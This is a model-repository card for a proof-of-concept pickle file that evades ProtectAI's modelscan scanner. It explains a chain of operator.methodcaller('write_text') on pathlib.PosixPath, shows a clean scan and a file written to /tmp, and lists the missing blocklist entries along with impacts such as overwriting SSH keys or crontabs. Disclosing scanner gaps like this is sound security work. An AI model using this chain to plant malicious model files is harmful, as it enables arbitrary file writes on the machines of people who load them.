You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

Modelscan Bypass PoC β€” pathlib.PosixPath.write_text

Summary

This pickle file bypasses ProtectAI's modelscan scanner and achieves arbitrary file write when loaded with pickle.load() or torch.load().

Technique

Uses pathlib.PosixPath combined with operator.methodcaller("write_text", ...) to write arbitrary content to any file path. Neither pathlib nor operator.methodcaller appear in modelscan's unsafe_globals blocklist.

Chain: operator.methodcaller("write_text", "<content>") β†’ pathlib.PosixPath("<target_path>")

Scan Result

$ modelscan scan -p model.pkl
No issues found! πŸŽ‰

Execution Result

$ python3 -c "import pickle; pickle.load(open('model.pkl','rb'))"
$ cat /tmp/pwned_pathlib.txt
PWNED_VIA_PATHLIB

Impact

Arbitrary file write β€” can overwrite config files, crontabs, SSH authorized_keys, or drop webshells. Combined with pathlib.PosixPath.read_text (via a second methodcaller), also enables arbitrary file read.

Blocklist Gaps

  1. pathlib module β€” entirely missing from unsafe_globals
  2. operator.methodcaller β€” not blocked (only operator.attrgetter is listed)
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support